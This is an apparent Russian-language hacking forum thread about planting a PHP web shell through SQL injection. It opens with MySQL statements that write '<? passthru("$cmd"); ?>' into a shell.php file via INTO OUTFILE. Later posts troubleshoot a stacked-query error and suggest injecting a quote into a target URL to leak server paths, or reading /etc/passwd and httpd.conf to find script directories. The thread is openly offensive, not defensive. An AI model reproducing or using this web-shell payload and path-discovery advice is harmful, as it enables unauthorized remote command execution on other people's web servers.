CREATE TABLE `shell` (s TEXT);
INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
SELECT `s` INTO OUTFILE '/svoi/puti/k/saity/shell.php' FROM `shell`;
DROP TABLE `shell`;

ето ты конечно ловко придумал:
SELECT `s` INTO OUTFILE '/svoi/puti/k/saity/shell.php' FROM `shell`;

только вот как узнать полные пути к катологам в которых разрешено выполнение скриптов?

Попробуй на самом серваке скрипты пощупать. Может удача улыбнёться и ты увидишь северный путь :d

__________________
-=Ok let's Go=-
-=OpenVPN=-

У меян короче такой же косяк. Я короче путь знаю всё когда прописываю выдаёт следующее "You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '; INSERT INTO `shell` values (''); SEL". Я в скулях особо не разбираюсь но скажите мне что за ошибка?

__________________
-=Ok let's Go=-
-=OpenVPN=-

INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
замени на
INSERT INTO `s` values ('<? passthru("$cmd"); ?>');

А разницы? лучше не стало такая же ошибка. Использую скрипт от rst.

__________________
-=Ok let's Go=-
-=OpenVPN=-

victim.ru/check.php=into
Это просто глупый пример,попробуй вместо into подставить ' ,если будет ошибка узнаешь часть серв. пути.
victim.ru/check.php='

2 SanyaX
версия твоего мускуля не поддерживает выполнение нескольких sql запросов через ; вот и все... насколько я понимаю

ну можно например из /etc/passwd узнать путь к апачу. оттуда по всем извесным относительным путям conf/httpd.conf узнаешь путь к директории со скриптами. санякс пока ни одна версия мускля не обрабатывает запрос после ; по-крайней мере пхп библиотека для работы с мускл сервером за один mysql_query этого не позволяет.